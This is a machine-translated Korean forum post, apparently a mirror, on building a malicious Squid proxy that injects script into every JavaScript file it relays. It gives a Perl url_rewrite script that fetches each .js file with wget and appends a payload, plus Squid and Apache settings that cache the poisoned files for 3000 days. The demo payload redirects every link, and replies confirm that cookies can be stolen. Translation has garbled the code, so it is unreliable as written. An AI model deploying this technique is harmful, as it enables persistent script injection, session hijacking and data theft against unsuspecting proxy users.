이 글은 기계 번역의 미러 문서이며, 원본 기사로 바로 이동하려면 여기를 클릭해 주세요.

보기: 14819|회답: 3

[안전한 소통] 프록시 서버를 이용해 사용자의 개인 데이터를 탈취하세요

[링크 복사]
게시됨 2015. 1. 19. 오전 2:34:56 | | | |
이 글은 2015-6-7 23:19에 Mo Xiaowen이 마지막으로 편집했습니다.


이는 SQUID의 구성을 단순히 수정함으로써 가능합니다
SQUID란 무엇인가요?
스퀴드는 인터넷 데이터를 캐시하고, 사용자로부터 다운로드 요청을 받으며, 다운로드된 데이터를 자동으로 처리하는 소프트웨어입니다. 사용자가 홈페이지를 다운로드하고 싶을 때, 스퀴드에게 요청을 보내 스퀴드가 대신 다운로드하도록 요청할 수 있습니다. 그 후 스퀴드는 웹사이트에 접속해 홈페이지를 요청한 뒤, 백업을 유지하면서 홈페이지를 사용자에게 전송합니다. 다른 사용자가 같은 페이지에 신청하면 스퀴드는 즉시 저장된 백업을 사용자에게 보내 사용자가 속도가 꽤 빠르다고 느끼게 합니다. Squid는 HTTP, FTP, GOPHER, SSL, WAIS 같은 프로토콜을 프록시할 수 있고, 자동으로 처리하며, 필요에 따라 Squid를 설정해 원치 않는 것을 걸러낼 수 있습니다.
Squid는 AIX, 디지털, UNIX, FreeBSD, HP-UX, Irix, Linux, NetBSD, Nextstep, SCO, Solaris, OS/2 등 다양한 운영체제에서 작동할 수 있습니다.
구현은 매우 간단합니다:
1. 한 리눅스 서버에 Squid를 설치합니다.
2. 서버의 코드를 수정하고, 전송된 모든 자바스크립에 우리 코드를 삽입한 뒤 전송합니다.
3. 수정된 js 파일의 캐시 시간을 최대한 높게 설정하세요.
이 방법은 SSL이 활성화된 웹사이트에도 적용되며, 웹사이트가 보안이 취약한 리소스(예: HTTP 사이트의 jquery)를 불러오면 대부분의 브라우저는 경고를 보내지만 거의 신경 쓰지 않습니다.
체마는 그가 프록시를 공개한 지 며칠 만에 5,000명 이상이 프록시를 사용했다고 말했습니다. 대부분은 프록시를 사용해서 익명이고 안전하다고 생각했기 때문에 나쁜 일을 저질렀지만, 프록시 서버가 나쁜 짓을 할 줄은 전혀 예상하지 못했습니다.
악성 프록시 서버를 만드세요
이미 Squid 프록시 서버가 있다면 Apache와 같은 웹 서버도 필요합니다.
1단계 페이로드 생성
저는 간단한 스크립트를 시연으로 사용해 모든 하이퍼링크를 제 웹사이트로 가리킵니다.
/etc/squid/payload.js

[mw_shl_code=javascrip t를 제거, true]for(var i=0; i<document.getelementsbytagname('a').length; i++)
document.getElementsByTagName('a').href = "https://blog.haschek.at"; [/mw_shl_code]
2단계 모든 JS 파일을 감염시키는 스크립트를 작성합니다
/etc/squid/poison.pl
[mw_shl_code=펄, 진실]
#!/USR/bin/Perl
$|=1;
$count = 0;
$pid = $$;
while(<>)
{
  씹어 $_;
  if($_ =- /(.*.js)/i)
  {
        $url = $1;
        system("/usr/bin/wget","-q","-O","/var/www/tmp/$pid-$count.js","$url");
        시스템("chmod o+r /var/www/tmp/$pid-$count.js");
        시스템("cat /etc/squid/payload.js >> /var/www/tmp/$pid-$count.js");
        "http://127.0.0.1:80/tmp/$pid-$count.js"을 인쇄;
  }
  그렇지 않으면
  {
        "$_"를 인쇄;
  }
$count++;
}[/mw_shl_code]
이 스크립트는 wget을 사용해 페이지의 원본 javascrip을 얻고 t 파일을 제거한 뒤, /etc/squid/payload.js에 코드를 추가한 뒤 수정된 파일을 클라이언트에 보내는데, 그 사이 /var/www/tmp 디렉터리를 만들고 Squid가 파일을 작성할 수 있도록 해야 합니다. 이 디렉터리는 수정된 js 파일을 저장합니다.


3단계: 위 스크립트를 오징어와 결합하세요
/etc/squid/squid.conf에 추가하세요
[mw_shl_code=html,true]url_rewrite_program /etc/squid/poison.pl[/mw_shl_code]
4단계 캐시가 절대 실패하지 않도록 하기
/var/www/tmp/.htaccess
[mw_shl_code=html, true] 만료 활성화 중
만료 기본값 "접근 권한 플러스 3000일"[/mw_shl_code]
이렇게 하면 Apache가 사용자가 캐시를 정리할 때까지 긴 만료 시간을 주도록 알립니다.


이 프록시를 연결하면, 어떤 하이퍼링크를 클릭하든 제 웹사이트로 리디렉션되며, 프록시를 사용하지 않아도 캐시는 계속 존재합니다. 저는 공격적이지 않은 페이로드를 사용했는데, 이 방법으로 해커들이 훨씬 더 많은 일을 할 수 있습니다. 그러니 자신과 친구들에게 무료 프록시 사용에 대해 조심하라고 상기시키세요.





이전의:수천 개의 FLASH 투명 재료
다음:안드로이드 기기가 아이폰과 아이패드를 몇 분 만에 바꾸는 (매우 쉽습니다)
게시됨 2015. 1. 19. 오전 8:48:45 |
네, 프록시 서버가 모든 접근 데이터를 가로챌 수 있으며, 게시물 제출도 포함해서, 그렇다면 어떻게 프라이버시가 말할 수 있을까요?
게시됨 2015. 1. 19. 오전 9:53:53 |
내 쿠키를 가로챌 수 있을까?
 집주인| 게시됨 2015. 1. 20. 오후 2:36:06 |
Wu Soft Inquiry Group, 2015-1-19 09:53에 게시됨
내 쿠키를 가로챌 수 있을까?

네                                             
면책 조항:
Code Farmer Network에서 발행하는 모든 소프트웨어, 프로그래밍 자료 또는 기사는 학습 및 연구 목적으로만 사용됩니다; 위 내용은 상업적 또는 불법적인 목적으로 사용되지 않으며, 그렇지 않으면 모든 책임이 사용자에게 부담됩니다. 이 사이트의 정보는 인터넷에서 가져온 것이며, 저작권 분쟁은 이 사이트와는 관련이 없습니다. 위 내용은 다운로드 후 24시간 이내에 컴퓨터에서 완전히 삭제해야 합니다. 프로그램이 마음에 드신다면, 진짜 소프트웨어를 지원하고, 등록을 구매하며, 더 나은 진짜 서비스를 받아주세요. 침해가 있을 경우 이메일로 연락해 주시기 바랍니다.

Mail To:help@itsvse.com